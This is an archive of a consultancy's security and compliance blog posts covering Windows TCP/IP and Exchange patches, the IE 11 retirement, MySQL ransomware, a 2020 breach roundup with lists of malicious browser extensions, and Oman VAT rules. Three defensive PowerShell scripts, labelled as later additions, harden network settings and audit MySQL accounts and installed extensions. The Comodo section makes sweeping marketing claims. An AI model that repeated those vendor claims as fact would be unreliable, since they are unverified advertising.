Archive for the ‘Security and Compliance’ category

Microsoft’s April 2021 Patch Tuesday

April 17th, 2021

Update Tuesday is the monthly cycle in which Microsoft releases patches for vulnerabilities. As a best practice, Microsoft encourages customers to turn on automatic updates.

Security hygiene and patch management are as important as ever to protect against both sophisticated and common cybercriminal activity. Customers should ensure they are on the latest version of their software with current security updates. It is common for attackers to shift their efforts to exploit recently disclosed vulnerabilities before the latest updates or patches are installed, which is why it is so important that customers migrate to the latest supported software.

This month’s release includes a number of critical vulnerabilities to prioritize, including updates to protect against new vulnerabilities in on-premise Exchange Servers. Given the recent focus on Exchange vulnerabilities, we recommend customers install the updates as soon as possible to ensure they remain protected. Customers using Exchange Online are already protected and do not need to take any action.

More details on all of this month’s updates can be found in the Security Update Guide. More information on best practice can be found in the following resources:

Critical Windows fix

February 14th, 2021

A critical flaw was discovered in Windows 10 that could allow hackers to unleash a devastating attack on PCs and render the devices useless. Customers who have automatic updates enabled are automatically protected from these vulnerabilities.

Last week Microsoft released a set of fixes affecting the Windows TCP/IP implementation that include two Critical Remote Code Execution (RCE) vulnerabilities (CVE-2021-24074, CVE-2021-24094) and an Important Denial of Service (DoS) vulnerability (CVE-2021-24086). The two RCE vulnerabilities are complex, which makes it difficult to create functional exploits, so RCE exploitation is not likely in the short term. We believe attackers will be able to create DoS exploits much more quickly, and we expect all three issues might be exploited with a DoS attack shortly after release. Thus, we recommend customers move quickly to apply Windows security updates this month.

The DoS exploits for these CVEs would allow a remote attacker to cause a stop error. Customers might receive a blue screen on any Windows system that is directly exposed to the internet with minimal network traffic.

It is essential that customers apply Windows updates to address these vulnerabilities as soon as possible. If applying the update quickly is not practical, workarounds are detailed in the CVEs that do not require restarting a server. These three vulnerabilities are unique and require separate workarounds depending on the exposure of an affected system; however, they can be thought of in terms of Internet Protocol version 4 (IPv4) and Internet Protocol version 6 (IPv6) solutions.

The IPv4 workaround simply requires further hardening against the use of Source Routing, which is disallowed in Windows default state. This workaround is documented in CVE-2021-24074 and can be applied through Group Policy or by running a NETSH command that does not require a reboot. The IPv6 workarounds are documented in CVE-2021-24094 and CVE-2021-24086, and require blocking IPv6 fragments, which may negatively impact services with dependencies on IPv6.
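The following PowerShell script is an added example and is not part of the original post or of Microsoft's advisories. It reports the two settings the workarounds above change and, only when asked, applies them without a reboot. It assumes an elevated PowerShell 5.1+ prompt on Windows 10 or Windows Server, that the `netsh` parameter names `sourceroutingbehavior` and `reassemblylimit` are the ones documented in the CVE advisories (confirm them against the Security Update Guide before rolling out via Group Policy), and that the English labels in `netsh ... show global` output apply; on a localized Windows the label strings in the script need adjusting. The registry value read is the one written by the Group Policy setting "MSS: (DisableIPSourceRouting)".

```powershell
# Added example (not from the original post or Microsoft): show and optionally apply
# the netsh workarounds for CVE-2021-24074 (IPv4 source routing) and
# CVE-2021-24094 / CVE-2021-24086 (IPv6 fragment reassembly).
# Assumptions: elevated prompt; parameter names as documented in the CVE advisories;
# English netsh output labels.
#Requires -RunAsAdministrator
[CmdletBinding(SupportsShouldProcess)]
param(
    [switch]$HardenIPv4,   # apply sourceroutingbehavior=drop (no reboot needed)
    [switch]$HardenIPv6    # apply reassemblylimit=0 (drops ALL IPv6 fragments, see caveat)
)

function Get-NetshGlobalValue {
    # Parse one "Label : value" line out of 'netsh interface <family> show global'.
    param([ValidateSet('ipv4', 'ipv6')][string]$Family, [string]$Label)
    $line = netsh interface $Family show global | Where-Object { $_ -match "^\s*$Label\s*:" }
    if (-not $line) { return $null }
    return (($line | Select-Object -First 1) -split ':', 2)[1].Trim()
}

$ipv4SourceRouting = Get-NetshGlobalValue -Family ipv4 -Label 'Source Routing Behavior'
$ipv6Reassembly    = Get-NetshGlobalValue -Family ipv6 -Label 'Reassembly Limit'
# Value written by the "MSS: (DisableIPSourceRouting)" Group Policy setting; 2 = fully disabled.
$tcpipParams = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters' -ErrorAction SilentlyContinue
$regSourceRouting = if ($tcpipParams) { $tcpipParams.DisableIPSourceRouting } else { $null }

[pscustomobject]@{
    IPv4SourceRoutingBehavior     = $ipv4SourceRouting   # default 'dontforward'; workaround wants 'drop'
    IPv4DisableIPSourceRoutingReg = $regSourceRouting    # 2 when hardened via Group Policy
    IPv6ReassemblyLimit           = $ipv6Reassembly      # workaround sets this to 0
} | Format-List

if ($HardenIPv4 -and $ipv4SourceRouting -ne 'drop') {
    if ($PSCmdlet.ShouldProcess('IPv4 global settings', 'set sourceroutingbehavior=drop')) {
        netsh interface ipv4 set global sourceroutingbehavior=drop
    }
}
if ($HardenIPv6 -and $ipv6Reassembly -ne '0') {
    # Caveat from the post: blocking IPv6 fragments can break services that depend on IPv6,
    # so test on a representative host before applying fleet-wide.
    if ($PSCmdlet.ShouldProcess('IPv6 global settings', 'set reassemblylimit=0')) {
        netsh interface ipv6 set global reassemblylimit=0
    }
}
```

Run it with no switches to audit a host, and with `-HardenIPv4 -WhatIf` to see what would change before committing; the IPv6 switch is kept separate so the fragment-blocking side effect is a deliberate choice rather than a default.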

It is important that affected systems are patched as quickly as possible because of the elevated risk associated with these vulnerabilities, and downloads for these can be found in the Microsoft Security Update Guide.

Microsoft 365 apps and services will no longer support IE 11

February 3rd, 2021

Last August Microsoft announced that Microsoft 365 apps and services will no longer support Internet Explorer 11 (IE 11) by August 2021.

Since November 30, 2020, the Microsoft Teams web app no longer supports IE 11.
To access Microsoft Teams, use the desktop app or a supported modern browser like the new Microsoft Edge.

Beginning August 17, 2021, the remaining Microsoft 365 apps and services will no longer support IE 11.
This means that after the above dates, customers will either be unable to connect to Microsoft 365 apps and services on IE 11 or have a degraded experience – new Microsoft 365 features will not be available or certain features may cease to work when accessing the app or service via IE 11.
This change will be difficult for some users.

Customers have been using IE 11 since 2013 when the online environment was much less sophisticated than the landscape today. Since then, open web standards and newer browsers—like the new Microsoft Edge—have enabled better, more innovative online experiences.

Respecting investments in IE 11 web apps
IE 11 isn’t going away (1) and customers’ own legacy IE 11 apps and investments will continue to work. Customers may have made business-critical investments in IE 11 legacy apps and those apps are still functioning. While bridging between modern and legacy apps, many customers may have no choice but to rely on a two-browser workaround of using IE 11 alongside a modern browser. However, with the new Microsoft Edge and Internet Explorer mode, customers don’t need an awkward workaround of one browser for some apps and another for other apps. They can standardize on one browser and seamlessly experience the best of the modern web in one tab while accessing a business-critical legacy IE 11 app in another tab – all housed within the new Microsoft Edge.

With native integration in Microsoft management, security, and productivity tools, we recommend the new Microsoft Edge to address customers’ compatibility and secure remote work needs. Microsoft Edge has SmartScreen built in and has the highest-rated phishing and malware protection as measured by two independent studies. Microsoft engineers are ready to help customers in case they run into compatibility issues. For more information, see the ‘Help is available’ section below.

Note: Using Internet Explorer mode in the new Microsoft Edge will not help to extend IE 11 access to Microsoft 365 apps and services beyond the dates listed above. Microsoft 365 apps and services will stop supporting IE 11 on the dates listed.

Microsoft Edge Legacy makes way for the new Microsoft Edge
The new Microsoft Edge is a browser built on the Chromium open source engine with the latest in Microsoft enterprise capabilities. Since its release in January 2020, millions of users have upgraded their home and work browsers to the new Microsoft Edge. Additionally, new devices and future Windows feature updates (starting with Windows 10, version 20H2) will contain the new Microsoft Edge.

Microsoft is ending support for the Microsoft Edge Legacy desktop app on March 9, 2021.
After March 9, 2021, the Microsoft Edge Legacy desktop app will not receive new security updates.

We recommend that customers first read the detailed Microsoft article about how to plan for deployment. The article guides customers through key questions and offers a path forward for major steps in the transition to the new Microsoft Edge.

Next, customers should determine what type of support they may need.
Customers with Microsoft Unified Support can reach out to that support service for help transitioning to the new Microsoft Edge.

Microsoft FastTrack is available at no additional charge to customers with 150 or more paid seats of Windows 10 Enterprise. To get started, submit a Request for Assistance through the FastTrack site.

For those customers who prefer to get started on their own, there are self-guided deployment and configuration materials, complete with a series from Microsoft Mechanics, ready on our Docs site.

App Assure
It is natural for customers to be concerned about compatibility when it comes to business-critical apps and sites. The App Assure promise is this: if customers’ web apps and sites work on IE 11, supported versions of Google Chrome, or any version of Microsoft Edge (including Microsoft Edge Legacy), those web apps and sites should work on the new Microsoft Edge.

If not, then they can contact App Assure for remediation support here or by email (ACHELP@microsoft.com).

Assistance is provided in Traditional Chinese and Simplified Chinese (support specialists speak Mandarin only), English, French, German, Italian, Japanese, Korean, Portuguese (Brazil), and Spanish.

To learn more about the new Microsoft Edge, customers can view the How to Get Started End User Guide.
(1) Internet Explorer 11 is a component of the Windows operating system and follows the Lifecycle Policy for the product on which it is installed.

What is the true cost of software development?

January 9th, 2021

There has been much talk of both DevOps and citizen developers.
While these new paradigms are welcome and bring many benefits, that does not mean they replace other proven systems of software development.

There are reasons why some consultancies quote significantly lower development times than others: usually it is a lack of knowledge or awareness of what needs to be considered, or they deliberately cut corners in areas like security, validation, documentation, testing, and so on.

If that sounds harsh, then take a look at this recent post:
A report published last week by the Consortium for Information & Software Quality (CISQ) estimates poor software quality collectively cost companies in the U.S. an estimated $2.08 trillion in 2020.

Ransomware that is Devastating MySQL Servers – be aware

December 29th, 2020

PLEASE_READ_ME is an active ransomware campaign that has been targeting MySQL database servers and dates back to at least the start of this year. The attack chain is extremely simple and exploits weak credentials on internet-facing MySQL servers. There are close to 5M internet-facing MySQL servers worldwide.

MySQL servers have often been used as a low cost alternative for applications like Dynamics Ax Retail store databases.

250,000 databases are offered for sale in the attackers’ dashboard, from 83,000 successfully-breached victims.

If you are using MySQL databases then we strongly recommend that you immediately review your credentials security and reference the link above.
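As a starting point for that credential review, here is an added PowerShell audit script; it is not from the original post or from any vendor. It queries a server you administer for the two weaknesses the campaign above relies on (accounts with no password and accounts reachable from any host) and shows whether the server is listening on all interfaces. It assumes the `mysql` command-line client is on PATH, that you hold an administrative login, and a MySQL 5.7/8.0 schema where `mysql.user` carries an `authentication_string` column; older releases and some MariaDB builds name these columns differently and need the query adjusted.

```powershell
# Added example (not from the original post): audit MySQL accounts and network
# exposure for the weaknesses exploited by the PLEASE_READ_ME campaign.
# Assumptions: mysql CLI on PATH, administrative login, MySQL 5.7/8.0 column names.
param(
    [string]$MysqlExe   = 'mysql',
    [string]$AdminUser  = 'root',
    [string]$ServerHost = '127.0.0.1'
)

# Accounts with an empty credential or a wildcard host. The plugin column matters:
# an empty authentication_string under auth_socket is fine, under
# mysql_native_password / caching_sha2_password it means "no password".
$accountQuery = @"
SELECT user, host, plugin,
       IF(authentication_string = '', 'EMPTY', 'set') AS password_state,
       IF(host = '%', 'ANY-HOST', host) AS reachable_from
FROM mysql.user
WHERE authentication_string = '' OR host = '%'
ORDER BY user, host;
"@

# Listening/transport settings: bind_address '*' or '0.0.0.0' with skip_networking OFF
# means the server is reachable from the internet if the firewall allows 3306.
$exposureQuery = @"
SHOW GLOBAL VARIABLES
WHERE Variable_name IN ('bind_address','skip_networking','require_secure_transport')
   OR Variable_name LIKE 'validate_password%';
"@

function Invoke-MysqlTsv {
    # Run one query in batch mode and turn the tab-separated rows into objects.
    # '-p' with no value makes the client prompt for the password, so it never lands
    # on the command line or in shell history (a mysql_config_editor login path works too).
    param([string]$Query, [string[]]$Columns)
    $rows = & $MysqlExe -h $ServerHost -u $AdminUser -p --batch --skip-column-names -e $Query
    if ($LASTEXITCODE -ne 0) { throw "mysql client exited with code $LASTEXITCODE" }
    foreach ($line in $rows) {
        $fields = $line -split "`t"
        $obj = [ordered]@{}
        for ($i = 0; $i -lt $Columns.Count; $i++) { $obj[$Columns[$i]] = $fields[$i] }
        [pscustomobject]$obj
    }
}

$weakAccounts = Invoke-MysqlTsv -Query $accountQuery  -Columns user, host, plugin, password_state, reachable_from
$exposure     = Invoke-MysqlTsv -Query $exposureQuery -Columns Variable_name, Value

Write-Host "Accounts with no password or reachable from any host ($($weakAccounts.Count) found):"
$weakAccounts | Format-Table -AutoSize
Write-Host "Network exposure and password policy settings:"
$exposure | Format-Table -AutoSize
```

An empty result for the first query and a `bind_address` limited to a private interface (or `skip_networking` ON where only local clients are needed) is the state to aim for; anything listed under ANY-HOST with password_state EMPTY deserves immediate attention.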

Rampant security attacks – be aware

December 18th, 2020

Cyber criminals have been relentless this year. Data breaches, network infiltrations, bulk data theft and sale, identity theft, and ransomware outbreaks all occurred over 2020. Remote workers account for up to 20% of cybersecurity incidents, and ransomware is on the rise.

This month alone has seen major breaches:
Leonardo SpA: Italian police arrested suspects believed to have stolen up to 10GB in sensitive corporate and military data from the defense contractor.
Flight Centre: A 2017 hackathon launched by the company was found to be the source of a leak involving credit card records and passport numbers belonging to close to 7,000 people.
Vancouver TransLink: A ransomware attack disrupted Compass metro cards and Compass ticketing kiosks for two days.
Absa: A rogue employee at the South Africa-based bank is thought to be responsible for the leak of personally identifiable information belonging to customers.
HMRC: The UK tax office was branded ‘incompetent’ due to 11 serious data breaches impacting close to 24,000 people.

Microsoft Warns Of New Malware That Wants To Infect Your Browser: Security experts at Microsoft have been tracking a new malware campaign that’s targeting Windows computers. It’s already claimed tens of thousands of victims and hijacked their web browsers.
Earlier this month Microsoft issued its final batch of security updates for Windows PCs in 2020, ending the year with a relatively light patch load. Nine of the 58 security vulnerabilities addressed this month earned Microsoft’s most-dire “critical” label, meaning they can be abused by malware or miscreants to seize remote control over PCs without any help from users.

On December 8, 2020, FireEye disclosed theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security posture of their customers. According to FireEye, the hackers now have an influential collection of new techniques to draw upon.

FireEye last week also said it had discovered a “global intrusion campaign” that it called “widespread” in a blog post published Sunday evening: “The actors behind this campaign gained access to numerous public and private organizations around the world. FireEye discovered a supply chain attack trojanizing SolarWinds Orion business software updates in order to distribute malware we call SUNBURST. The attacker’s post compromise activity leverages multiple techniques to evade detection and obscure their activity, but these efforts also offer some opportunities for detection.”

The U.S. Commerce Department on Sunday confirmed a security “breach” at one of its bureaus, and said federal authorities are investigating.
Reuters, the news agency that first reported the hack, cited sources who said the U.S. Treasury Department was also breached, and that hackers may have broken into other government agencies as well. The sources told Reuters that hackers may have been able to monitor staff emails at the agencies for months. Reuters also reported that the affected bureau at the Commerce Department was the National Telecommunications and Information Administration. Subsequently the US issued an emergency warning that “nation-state” hackers hijacked software used by almost all Fortune 500 companies and multiple federal agencies to gain entry to secure IT systems.

On Sunday the Washington Post reported that the attack had been traced to Russian state-backed hacking groups.

It’s important that organisations are aware of the threats and have appropriate safeguards, policies and training. In the event of a breach it’s also important to have clearly defined policies on how to respond: it’s not just about dealing with the threat but also the consequences. For example, Ireland’s Data Protection Commission fined Twitter €450,000 (~$550,000) for failing to notify the DPC of a breach within the 72-hour timeframe imposed by the European Union’s General Data Protection Regulation (GDPR) and for failing to adequately document it.

To cap it all, Avast announced this week that more than three million Internet users have installed 15 Chrome plug-ins and 13 Edge plug-ins that contain malicious code.

These add-ons contain code that can redirect user traffic to ads and phishing sites, collect personal information such as birth dates, email addresses, and active devices, collect search history, and download other malware to the user’s device. Avast researchers believe that the primary goal of this campaign is to redirect user traffic for money.

Avast said that it discovered the add-ons last month and found evidence that some of these have been active at least since December 2018, when users first started reporting problems with redirection to other websites.

Jan Rubin, a malware researcher at Avast, said they could not determine whether the extensions contained malicious code from the beginning or whether the code was added by an update once each of them reached a certain level of popularity. Many of the add-ons have become very popular, with tens of thousands of installations. In most cases this was achieved by presenting them as add-ons that help users download multimedia content from various social networks, such as Facebook, Instagram, Vimeo or Spotify. Avast said that it had reported its findings to both Google and Microsoft and that both companies are still checking the add-ons.

Two days after Avast released its findings, Google had removed all 15 Chrome add-ons that Avast found to contain malicious code, while most Edge add-ons were still available for download. Only Pretty Kitty, The Cat Pet and SoundCloud Music Downloader had been removed.

Below is a list of Chrome add-ons that Avast said contain malicious code:
Direct Message for Instagram
DM for Instagram
Invisible mode for Instagram Direct Message
Downloader for Instagram
App Phone for Instagram
Stories for Instagram
Universal Video Downloader
Video Downloader for FaceBook™
Vimeo™ Video Downloader
Zoomer for Instagram and FaceBook
VK UnBlock. Works fast.
Odnoklassniki UnBlock. Works quickly.
Upload photo to Instagram™
Spotify Music Downloader
The New York Times News

Here’s a list of Edge plug-ins that contain malicious code:
Direct Message for Instagram™
Instagram Download Video & Image
App Phone for Instagram
Universal Video Downloader
Video Downloader for FaceBook™
Vimeo™ Video Downloader
Volume Controller
Stories for Instagram
Upload photo to Instagram™
Pretty Kitty, The Cat Pet
Video Downloader for YouTube
SoundCloud Music Downloader
Instagram App with Direct Message DM
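To check a Windows machine against the two lists above, here is an added PowerShell example; it is not from the original post or from Avast. It walks every user's Chrome and Edge profiles, reads each installed extension's `manifest.json`, and flags names that match the lists. It assumes the default Chromium profile layout under each user's `AppData\Local`, that the script runs with enough rights to read other users' profile folders, and that names can be compared case-insensitively with trademark signs stripped. A name match is a lead to investigate, not proof: extension IDs are the authoritative indicator and are not given on the page, and a manifest whose name is a localized `__MSG_...__` key cannot be compared by name, so those are reported for manual review.

```powershell
# Added example (not from the original post or Avast): find installed Chrome/Edge
# extensions whose manifest name matches a name from the lists above.
# Assumptions: default Chromium profile layout; rights to read all user profiles.

$FlaggedNames = @(
    'Direct Message for Instagram', 'DM for Instagram',
    'Invisible mode for Instagram Direct Message', 'Downloader for Instagram',
    'App Phone for Instagram', 'Stories for Instagram', 'Universal Video Downloader',
    'Video Downloader for FaceBook', 'Vimeo Video Downloader',
    'Zoomer for Instagram and FaceBook', 'VK UnBlock. Works fast.',
    'Odnoklassniki UnBlock. Works quickly.', 'Upload photo to Instagram',
    'Spotify Music Downloader', 'The New York Times News',
    'Instagram Download Video & Image', 'Volume Controller',
    'Pretty Kitty, The Cat Pet', 'Video Downloader for YouTube',
    'SoundCloud Music Downloader', 'Instagram App with Direct Message DM'
)

function ConvertTo-ComparableName {
    param([string]$Name)
    # Strip the trademark sign and collapse whitespace so 'Vimeo™ Video Downloader'
    # and 'Vimeo Video Downloader' compare equal.
    return ((($Name -replace '\u2122', '') -replace '\s+', ' ').Trim()).ToLowerInvariant()
}

$wantedNames = $FlaggedNames | ForEach-Object { ConvertTo-ComparableName $_ }

# Chromium "User Data" roots, relative to each user's home directory.
$BrowserRoots = @{
    Chrome = 'AppData\Local\Google\Chrome\User Data'
    Edge   = 'AppData\Local\Microsoft\Edge\User Data'
}

function Get-InstalledExtension {
    # Yields one object per <profile>\Extensions\<id>\<version>\manifest.json found.
    foreach ($userDir in Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue) {
        foreach ($browser in $BrowserRoots.Keys) {
            $userData = Join-Path $userDir.FullName $BrowserRoots[$browser]
            if (-not (Test-Path $userData)) { continue }
            foreach ($profile in Get-ChildItem $userData -Directory) {
                $extRoot = Join-Path $profile.FullName 'Extensions'
                if (-not (Test-Path $extRoot)) { continue }
                foreach ($idDir in Get-ChildItem $extRoot -Directory) {
                    foreach ($verDir in Get-ChildItem $idDir.FullName -Directory) {
                        $manifestPath = Join-Path $verDir.FullName 'manifest.json'
                        if (-not (Test-Path $manifestPath)) { continue }
                        try { $manifest = Get-Content $manifestPath -Raw | ConvertFrom-Json }
                        catch { Write-Warning "Unreadable manifest: $manifestPath"; continue }
                        [pscustomobject]@{
                            User        = $userDir.Name
                            Browser     = $browser
                            Profile     = $profile.Name
                            ExtensionId = $idDir.Name
                            Version     = $verDir.Name
                            Name        = [string]$manifest.name
                            Path        = $manifestPath
                        }
                    }
                }
            }
        }
    }
}

function Test-FlaggedExtension {
    # Adds a Status column: 'MATCHES AVAST LIST', 'localized name - review manually' or 'ok'.
    param([Parameter(ValueFromPipeline)][pscustomobject]$Extension)
    process {
        $status = if ($Extension.Name -like '__MSG_*__') { 'localized name - review manually' }
                  elseif ($wantedNames -contains (ConvertTo-ComparableName $Extension.Name)) { 'MATCHES AVAST LIST' }
                  else { 'ok' }
        $Extension | Add-Member -NotePropertyName Status -NotePropertyValue $status -PassThru
    }
}

Get-InstalledExtension | Test-FlaggedExtension |
    Where-Object { $_.Status -ne 'ok' } |
    Format-Table User, Browser, Profile, Name, ExtensionId, Version, Status -AutoSize
```

For a fleet, run it through your endpoint management tool and collect the output centrally; the `Path` column gives the exact folder to preserve before removal if an investigation is needed.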

Endpoint security against cybercrime – 7 key questions

December 17th, 2020

7 Vital Questions to Ask

Endpoint security has never been more important, more complex, or more challenging than it is today. Given the multitude of solutions and of vendors, it is very difficult to sort through all of the competing claims to find what’s truly effective.

1. Will this solution run on all the devices in my environment?
2. How long will deployment take?
3. What will the members of my team need to know or learn in order to work with this platform?
4. What types of preventative controls are in place?
5. From where does the vendor get its threat intelligence?
6. How does this solution integrate with incident response workflows, and is 24×7 professional support available from the vendor?
7. Can this solution be integrated with other security services, products, or platforms from the same vendor to reduce costs and complexity?

Why Comodo? Zero Percent Infection and Breaches for Customers

Comodo offers the only cybersecurity that stops undetectable threats.
Cloud-native cybersecurity with auto-containment stops zero-day threats that AI, ML, and other technologies miss.

Historical scores and statistics from millions of endpoints on thousands of different enterprise customer networks show zero percent infection and breaches.

With Comodo you can “Protect without Detection.” The cloud-native framework delivers zero-day protection against undetectable threats while defending your endpoints from known threat signatures. Automatic signature updates simplify deployment across your entire environment to lower operational costs.

Contact us about Advanced Endpoint Protection 0097143365589

OMAN VAT update November 2020 – ask Synergy Software Systems

November 27th, 2020

According to the International Monetary Fund, Oman’s economy is expected to shrink by 10 percent this year, the biggest contraction in the Gulf, and its fiscal deficit could widen to 18.3 percent of GDP from 7.1 percent last year.

On June 15 last year, Oman enacted an electronic system for registering excise taxpayers, setting the stage for residents to be taxed on products deemed harmful to public health and the environment after a 90-day grace period. The Omani “sin tax” involves a 100% levy on tobacco, pork, alcohol and energy drinks and a 50% tax on carbonated drinks. This year it increased the tax on alcohol to 100%.

Oman announced that it expects to introduce an income tax on high earners in 2022, the finance ministry said in a 2020-2024 economic plan, new details of which were published late on Sunday, as the Gulf state seeks to restore finances battered by low oil prices.

The plan also aims to redirect state subsidies to those groups who need it, rather than subsidize all users. Electricity and water tariffs will be changed gradually in the coming years, the document said.

Meanwhile Oman Royal Decree No. 121/2020 was passed, and the VAT Law was published by the Official Gazette of Oman on 18 October 2020. The date of implementation is expected to be 16 April 2021 (i.e. 180 days from the date of publication of the VAT Law). The Executive Regulations will clarify certain aspects of the VAT Law and those are expected to be published soon by the Official Gazette.
In the next 4-5 months’ time, businesses in Oman should consider the implementation impacts on the entire business, operations, procurement, sales, administration, human resources, information technology, etc. We advise an internal steering committee with a representative from each function.

The VAT Law published is exhaustive with the benefit of the experience of other GCC VAT Laws.

Registration
Muscat has set a voluntary registration threshold of 19,250 Omani riyals and mandatory registration for businesses and individuals with turnover of at least 38,500 riyals.
Non-resident businesses that provide taxable supplies will be required to VAT register. Unlike resident businesses, there will be no minimum threshold that needs to be met before nonresident businesses must register for VAT with Omani authorities. A non-resident business will probably have an option to appoint an agent in Oman – that does not have to be jointly and severally liable, nor a fiscal representative of the principal. More detail is expected in the executive regulations.
Rules for digital service providers based outside of Oman are still in development. Digital service providers based outside of Oman, as well as e-commerce services, will need to pay careful attention to regulations over the coming months to ensure compliance.

VAT impact assessment

Administration:
• VAT registration and gathering information from customers
• VAT recovery issues and VAT grouping
• VAT litigation avoidance strategies

The VAT fiscal impact:
• budgets, cash-flow, working capital, etc.
• Financial record keeping: it is to be expected that any company found to have kept inadequate records or issued incomplete invoices may be subject to potentially severe fines.

IT impact:
Ascertain the impact on the accounting system software and hardware, such as gathering and loading data, developing statutory reports and amending other financial reports.
• The law sets out rules for proper record keeping and invoicing. All VAT-registered entities must keep specified records, including customs and invoicing documentation, and retain these records for at least 10 years. Archive storage space/cost and the impact of future planned system upgrades need to be considered.
• The law specifies mandatory filing requirements, including documentation required when filing VAT returns. Now might be a good time to look at both document management systems and RPA, e.g. for data entry validation, VAT reconciliation or data entry to government websites.

Process and documentation impact,
Redefine the processes under VAT – quotes, contracts and terms and conditions will need revision. Update your process documents for audit purposes.
VAT is a transaction-based tax, so the underlying legal documentation (i.e., the contract or terms) detailing the supply of a good or service is the start of the review process. Review your contracts to determine the Omani VAT impact. Does the contract account for VAT (and/or other taxes)? When a contract is ‘silent on VAT’, this could well mean that the amounts specified therein are treated as inclusive of VAT. To avoid misunderstanding, such “silent” contracts should ideally be updated. Parties may need to (re)negotiate the consideration to account for non-recoverable VAT.
Businesses should also review the contracts to determine whether they reflect economic reality. Are the parties to the contracts the actual supplier and recipient of the service or goods? This is important in relation to the invoices issued by the supplier and, the right of the recipient to potentially recover VAT.
To apply the correct VAT treatment of the supply of a service or good, the supplier may need to obtain additional information from the recipient.
Contracts and/or terms and conditions may need to be revised in order to collect or store such information and to ascertain the correct Omani VAT treatment of the services or goods supplied.

Invoicing
Chapter 8 of the law outlines invoicing requirements. Any person making a taxable supply of goods or services will be required to issue a tax invoice, which may be in the form of an e-invoice rather than in paper format.
The details required to be disclosed on a tax invoice, the language in which invoices must be issued, rules for simplified tax invoices, and other similar requirements are expected to be set out in the executive regulations. Currently, it is expected that invoicing will be permitted in English and that use of Arabic will not be compulsory. The executive regulations are expected to specify when a business will be exempt from issuing tax invoices.
The requirement to issue tax invoices is also triggered in other circumstances, e.g., the receipt of advance payments that generate a requirement to account for VAT, or the making of deemed supplies.
For businesses issuing invoices in a foreign currency, the VAT amount must be stated in Omani Rials (OMR) and be converted using the average purchase and sale price of the relevant currency published by the Central Bank of Oman on the date on which the VAT is due. The tax authorities are expected to clarify whether any other conversion methods will be permitted.
This may affect your accounting system because you may use different rates contractually, for corporate budgets, or for period-end revaluation.

User training, e.g.:
– how to add a customer TRN
– how to file a return
– how to draft a new quote or contract
– system changes

Transition management
Based on the VAT implementation in other GCC countries, there are challenges to be expected during the process. Complacency is a major risk, as is starting the implementation and transition activity late, and not allowing adequate time to test system and process changes.
Consider, for example, instances in which goods or services are paid for prior to the law coming into effect but are only delivered once the law is in place.
The regulations indicate that VAT will have to be paid in such circumstances. However, further questions are raised in terms of invoicing and filing. More details are expected to be provided on precisely how compliance will function under these transitional circumstances.
Appoint a proven implementation expert to walk you through each type of business transaction and its treatment, to avoid penal consequences.

Place of Supply
Understanding the concepts of “Supply”, “Place of Supply” and “Time of Supply” is critically important for effective implementation of Oman VAT. The place of supply shall be determined on the basis of the place of final consumption of the supply, regardless of the product’s place of origin. When the supplies are consumed within Oman, they shall be subject to VAT. Services supplied outside of Oman to its residents will be treated as supplies in Oman. Some exemptions will apply to certain services provided to end-users outside of Oman.

For services, the place of supply depends on (i) the type of recipient (is the service business-to-business or business-to-consumer?) and (ii) the type of service. Special rules may apply to certain services such as real estate related services or electronically supplied services (or e-services). Real estate related services and e-services are always deemed to be supplied where the real estate is located respectively where the recipient is located. Particularly, overseas business-to-consumer suppliers of e-services should be aware that they will need to charge, collect and remit Omani VAT to the tax authorities.

Businesses in Oman which import services or goods may need to account for Omani VAT by means of a reverse charge mechanism. Such VAT would in principle be recoverable if and to the extent the business renders VAT taxable activities.
E-services are subject to VAT when the recipient of such services is located or residing in Oman. A reverse charge mechanism applies in the case of business-to-business supplies of e-services, under which the burden of VAT is shifted from an overseas supplier to the Omani recipient. As of April 1, 2021, foreign and domestic e-service suppliers should obtain customer information (i.e., a verified VAT number) to determine their customers’ status (business or consumer).

Free zones
Businesses operating within free zones, special economic zones and duty free zones are likely to be subject to special VAT rules. Concessional VAT treatments are likely to be applicable for supplies within, to and from the customs duty suspension zones, free zones or special zones. Importers, who avail themselves of customs duty suspension benefits under the GCC Common Customs Law, would also likely be eligible for similar benefits under VAT. Dealing with this may require your accounting system to be able to handle a ‘reverse charge’ process.
Responsible person
All businesses will be required to have a responsible person who oversees VAT compliance. This person is liable to any penalties for failures to comply. This is similar to the UK’s Senior Accounting Officer concept, where a person can be fined up to £5,000 for not taking appropriate actions to stay compliant.
In Oman, the responsible person can personally be fined up to 10,000 OMR (nearly £20,000) with a prison sentence of up to one year. The fine can be doubled and the jail sentence doubled for repeat offenders. Any late submissions are subject to a 1% fine on the owed tax every month.
The severity of the punishments puts the responsible person under considerable pressure to get things right. In a complex business, multiple users make VAT decisions, often with minimal VAT training, and if you are relying on others to input data correctly then it’s imperative they do it correctly, as the consequences of non-compliance are life-changing.
If I were in this position, I would be doing everything in my power to achieve full compliance by using the best resources and tax technology available to me. I would also document all my recommendations.
The sensible way to mitigate the possibility of non-compliance is to minimise the risk of human error. For large businesses this means automating their VAT determination. Integrated finance/ERP systems and RPA are two obvious solutions.
Most enterprise-level businesses will be processing thousands of transactions a day, so human error will naturally occur when choosing tax codes, especially while VAT is a new concept in the country and wider region. Eventually staff become complacent or change jobs, and new-hire induction and training is less risky with automated systems.
Contact us for more information on systems we have already localised for VAT compliance, and how RPA automation can reduce cost and risk.

Exemptions:
Supply of foodstuffs, medicines and medical equipment is to be determined by the decision of the President, after coordination with the competent authorities. Some of the basic foodstuffs will also be exempted from five per cent VAT. In addition to financial services, provision of healthcare and education and their related goods and services, other exemptions are undeveloped lands (bare lands); resale of residential properties; local passenger transport; and renting real estate for residential purposes. Investment gold, silver and platinum; supplies of international goods and passenger transport and related services; supply of rescue aircraft, boats and auxiliary ships; supply of crude oil and its oil derivatives and natural gas; import of maritime, air and land transport vehicles for transport of goods for commercial purposes as well as import of related services; and supplies for the disabled and charity organisations have been designated as zero rated.

Sector challenges

Retail sector: Certain food items may be zero-rated as per the VAT Law. The list of items which are zero-rated is not yet published. Businesses need to map the product with the list (consider the composition of the product, purpose, etc.). Incorrect classification could lead to a wrong zero-rating position.

Pharma sector: Medicines and medical equipment are zero-rated. However, the zero-rating is expected to apply only where the medicines are approved by / registered with the competent authorities. The approval could be generic, or it may apply for a certain period / certain class of medicines. For each sale / purchase there may need to be validation of whether the medicine is approved before zero-rating is applied.
Financial services: Banks and large financial institutions should classify their products into margin / fee-based income because margin is exempt from VAT and fee-based income is subject to VAT. Businesses must also consider the customer location because margins earned from a customer outside Oman will be zero-rated.
